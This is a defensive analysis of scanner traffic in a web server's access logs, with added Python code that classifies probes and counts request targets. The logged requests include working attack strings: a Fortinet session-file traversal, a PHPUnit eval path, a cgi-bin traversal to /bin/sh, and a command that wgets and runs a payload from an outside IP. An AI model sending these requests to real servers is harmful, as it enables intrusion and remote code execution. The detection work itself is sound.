Web server log analysis: September 2022

2022-11-03 Technical

I went through the access logs of a web server that is exposed to the internet and analyzed the traffic that is not ordinary visitor access.

Frequent requests

Probing for .env

Requests for the .env file that frameworks such as Laravel use to hold secrets (database credentials, API keys). If the web server serves the file as static content, those secrets leak to whoever asks.

/.env

VPN product vulnerabilities

This looks like traffic probing for the vulnerabilities in several VPN products listed below. The request seen in the log is the one for the Fortinet vulnerability (CVE-2018-13379), a path traversal in the SSL VPN web portal that reads the sslvpn_websession file holding active session data.

Palo Alto Networks (CVE-2019-1579)
Fortinet (CVE-2018-13379)
Pulse Secure (CVE-2019-11510)

Alert regarding vulnerabilities in multiple SSL VPN products

/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

Remote eval() via PHPUnit

Traffic trying to execute eval() through a vulnerability in PHPUnit, the PHP unit testing framework (CVE-2017-9841). The eval-stdin.php script evaluates the request body as PHP code, so it is only exploitable when a vendor directory containing development dependencies has been deployed under the document root.

/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

WordPress reconnaissance

Probing for the login page

/wp-login.php
/wp-admin/css/

Probing for wlwmanifest.xml

Checks whether the manifest file used by the Windows Live Writer tool exists. Since wp-includes/wlwmanifest.xml ships with every WordPress installation, these requests are really a way to discover WordPress installed under a subdirectory, which is why the same file is requested under many different prefixes.

/wp1/wp-includes/wlwmanifest.xml
/wp/wp-includes/wlwmanifest.xml
/wordpress/wp-includes/wlwmanifest.xml
/web/wp-includes/wlwmanifest.xml
/test/wp-includes/wlwmanifest.xml
/site/wp-includes/wlwmanifest.xml
/cms/wp-includes/wlwmanifest.xml
/blog/wp-includes/wlwmanifest.xml
/shop/wp-includes/wlwmanifest.xml
/2019/wp-includes/wlwmanifest.xml

References

JVNDB-2017-005280 - JVN iPedia - Vulnerability Countermeasure Information Database
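To turn the categories above into something that runs over a log, here is an added example (my code, not the post author's) that normalizes request targets and matches them against signatures for the five probe types listed above. The category names and matching rules are my assumptions; the sample targets are constructed from the paths in the post. Normalization matters: `//.env` and `/%2Eenv` should count as the same probe as `/.env`, and the Fortinet traversal sits in the `lang` query parameter rather than in the URL path, so it has to be normalized separately.

```python
# Added example, not code from the original post: classify request targets
# taken from an access log into the probe categories described above.
# The signature rules and category names are my own assumptions.
import posixpath
import re
from collections import Counter
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote

FORTI_SESSION_FILE = "/dev/cmdb/sslvpn_websession"  # file read by CVE-2018-13379


def normalize_path(raw: str) -> str:
    """Strip the query string, percent-decode (twice, for double-encoded
    scanners), collapse repeated slashes and resolve '..' segments, so that
    '/.env', '//.env' and '/%2Eenv' all become '/.env'."""
    path = raw.partition("?")[0]
    path = unquote(unquote(path))
    path = re.sub(r"/+", "/", path)
    return posixpath.normpath("/" + path.lstrip("/"))


def classify(target: str) -> Optional[str]:
    """Return a category name for a request target, or None if it matches
    none of the probe signatures from the post."""
    path = normalize_path(target)
    query = parse_qs(target.partition("?")[2])

    if path.endswith("/.env"):
        return "env-file probe"
    if path == "/remote/fgt_lang":
        # CVE-2018-13379: the traversal lives in the 'lang' parameter, so the
        # parameter value, not the URL path, is what gets normalized here.
        lang = query.get("lang", [""])[0]
        if normalize_path(lang) == FORTI_SESSION_FILE:
            return "fortios-sslvpn-traversal (CVE-2018-13379)"
    if path.endswith("/phpunit/src/Util/PHP/eval-stdin.php"):
        return "phpunit-eval-stdin (CVE-2017-9841)"
    if posixpath.basename(path) == "wp-login.php":
        return "wordpress-login-probe"
    if path.endswith("/wp-includes/wlwmanifest.xml"):
        return "wordpress-wlwmanifest-discovery"
    return None


def summarize(targets: List[str]) -> Dict[str, int]:
    """Count targets per category; unmatched ones land in 'unclassified'."""
    counts: Counter = Counter()
    for target in targets:
        counts[classify(target) or "unclassified"] += 1
    return dict(counts)


# Constructed sample: paths from the post plus two encoded variants of /.env.
SAMPLE_TARGETS = [
    "/.env",
    "//.env",
    "/%2Eenv",
    "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession",
    "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
    "/wp-login.php",
    "/post/wp-login.php",
    "/wp1/wp-includes/wlwmanifest.xml",
    "/blog/wp-includes/wlwmanifest.xml",
    "/images/",
    "/sitemap.xml",
]

if __name__ == "__main__":
    for category, n in sorted(summarize(SAMPLE_TARGETS).items(), key=lambda kv: -kv[1]):
        print(f"{n:4d}  {category}")
```

Run directly it prints the per-category counts for the sample; fed a real log, the targets that end up in unclassified are the ones worth reading next, since every new scanner campaign shows up there first.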

List of suspicious requests

uri count
/test_404_page/ 324
/.env 264
/sellers.json 140
/wp-login.php 129
/uploads/ 117
/wp-admin/css/ 116
/sites/default/files/ 116
/.well-known/ 116
/images/ 115
/admin/controller/extension/extension/ 115
* 99
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 96
/actuator/gateway/routes 54
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession 51
mstshash=Domain 48
/boaform/admin/formLogin 40
/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application 37
mstshash=Administr 36
/xmlrpc.php?rsd 36
/wp1/wp-includes/wlwmanifest.xml 34
/wp/wp-includes/wlwmanifest.xml 34
/wordpress/wp-includes/wlwmanifest.xml 34
/web/wp-includes/wlwmanifest.xml 34
/test/wp-includes/wlwmanifest.xml 34
/site/wp-includes/wlwmanifest.xml 34
/cms/wp-includes/wlwmanifest.xml 34
/blog/wp-includes/wlwmanifest.xml 34
/Electron/download/windows/%5CProgram%20Files%5C3CX%20Phone%20System%5CData%5CDB%5Cbase%5C16384%5C16393 34
\x00\x00\x00\x00\x00\x00\x00 33
/shop/wp-includes/wlwmanifest.xml 33
/2019/wp-includes/wlwmanifest.xml 33
/post/wp-login.php 30
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f 30
/owa/auth/logon.aspx 30
/wp-includes/wlwmanifest.xml 29
/owa/auth/x.js 28
/.git/config 28
5.254.17.35:4444 25
/wp2/wp-includes/wlwmanifest.xml 25
/website/wp-includes/wlwmanifest.xml 25
/sito/wp-includes/wlwmanifest.xml 25
/news/wp-includes/wlwmanifest.xml 25
/spywall/timeConfig.php 23
/actuator/health 23
/2020/wp-includes/wlwmanifest.xml 23
/up.php 21
/app-ads.txt 21
/.well-known/security.txt 21
google.com:443 20
/_ignition/execute-solution 19
/wso.php 18
/sitemap.xml 18
/shell?cd+/tmp;rm+-rf+*;wget+185.216.71.192/jaws;sh+/tmp/jaws 18
/upload.php 17
/olux.php 17
/HNAP1/ 17
//.env 17
/wp-content/themes/seotheme/mar.php 16
/shell.php 16
/pools/default/buckets 10
/pools 10
/media/wp-includes/wlwmanifest.xml 10
/manager/html 10
/indoxploit.php 10
/hudson 10
/docs/cplugError.html/ 10
/doc.php 10
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 10
/__Additional 10
/Portal0000.htm 10
/Portal/Portal.mwsl 10
/CSS/Miniweb.css 10
/2018/wp-includes/wlwmanifest.xml 10
/0bef 10
/.DS_Store 10
7 9
/wp-includes/wp-class.php 9
/wp-includes/ID3/license.txt 9
/version 9
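The table above is a count of the request target per log line. As an added example (my code, not the post author's), here is a parser for the Apache/nginx combined log format that also copes with the non-HTTP request lines visible in the table: RDP connection requests that show up as `mstshash=...`, CONNECT proxy probes such as `5.254.17.35:4444`, and raw null bytes. The post does not say how its counting was done; the rules for non-HTTP lines, the `<unparsed line>` bucket, the sample log lines, and the guess that an `OPTIONS *` request is what appears as `*` in the table are all my assumptions.

```python
# Added example, not code from the original post: parse Apache/nginx
# "combined" access-log lines and count the request target per line, which
# is how a table like the one above is produced. The handling of non-HTTP
# request lines is my own assumption.
import re
from collections import Counter
from typing import Dict, List, Optional

# Quoted fields are matched as "non-quote char or backslash escape" rather
# than [^"]*, because Apache escapes embedded quotes as \" and
# non-printable bytes as \xNN.
QUOTED = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>' + QUOTED + r')" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>' + QUOTED + r')" "(?P<ua>' + QUOTED + r')"'
)
HTTP_REQ_RE = re.compile(r'^[A-Z]{3,7} (\S+)(?: HTTP/\d(?:\.\d)?)?$')
MSTSHASH_RE = re.compile(r'mstshash=([A-Za-z0-9_.-]*)')


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def request_target(request: str) -> str:
    """Pick the value worth counting from the raw request field."""
    m = HTTP_REQ_RE.match(request)
    if m:
        # GET /path, CONNECT host:port (proxy probe), OPTIONS * ...
        return m.group(1)
    m = MSTSHASH_RE.search(request)
    if m:
        # Assumption: a request containing 'Cookie: mstshash=' is an RDP
        # connection request sent to the HTTP port. The username is what the
        # scanner varies, so keep only that; the protocol truncates it to
        # 9 characters, which is why values like 'Administr' appear.
        return "mstshash=" + m.group(1)
    return request  # binary junk such as \x00\x00... is counted verbatim


def count_targets(log_text: str) -> Counter:
    """Count request targets over a block of log text."""
    counts: Counter = Counter()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec is None:
            counts["<unparsed line>"] += 1
            continue
        counts[request_target(rec["request"])] += 1
    return counts


def format_table(counts: Counter) -> List[str]:
    """Render 'uri count' rows, most frequent first (ties sorted by uri)."""
    rows = sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))
    return ["uri count"] + [f"{uri} {n}" for uri, n in rows]


# Constructed sample lines (client addresses from documentation ranges); the
# request strings mirror entries in the table above.
SAMPLE_LOG = r'''
203.0.113.10 - - [05/Sep/2022:10:21:07 +0900] "GET /.env HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.10 - - [05/Sep/2022:10:21:08 +0900] "GET //.env HTTP/1.1" 404 196 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Sep/2022:11:02:33 +0900] "GET /wp-login.php HTTP/1.1" 404 196 "-" "python-requests/2.28.1"
198.51.100.7 - - [05/Sep/2022:11:02:34 +0900] "GET /wp-login.php HTTP/1.1" 404 196 "-" "python-requests/2.28.1"
192.0.2.44 - - [06/Sep/2022:02:15:01 +0900] "CONNECT 5.254.17.35:4444 HTTP/1.1" 405 0 "-" "-"
192.0.2.45 - - [06/Sep/2022:02:15:02 +0900] "\x03\x00\x00/*\xe0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 226 "-" "-"
192.0.2.46 - - [06/Sep/2022:03:00:00 +0900] "\x00\x00\x00\x00\x00\x00\x00" 400 226 "-" "-"
192.0.2.47 - - [06/Sep/2022:03:00:01 +0900] "OPTIONS * HTTP/1.0" 200 0 "-" "-"
192.0.2.48 - - [06/Sep/2022:03:00:02 +0900] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 404 196 "-" "Mozilla/5.0 \"scanner\""
'''

if __name__ == "__main__":
    print("\n".join(format_table(count_targets(SAMPLE_LOG))))
```

Note that the counter deliberately does not normalize targets, which is why `/.env` and `//.env` come out as separate rows, just as they do in the table above; normalizing belongs in a second pass once you know which variants you want to merge.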
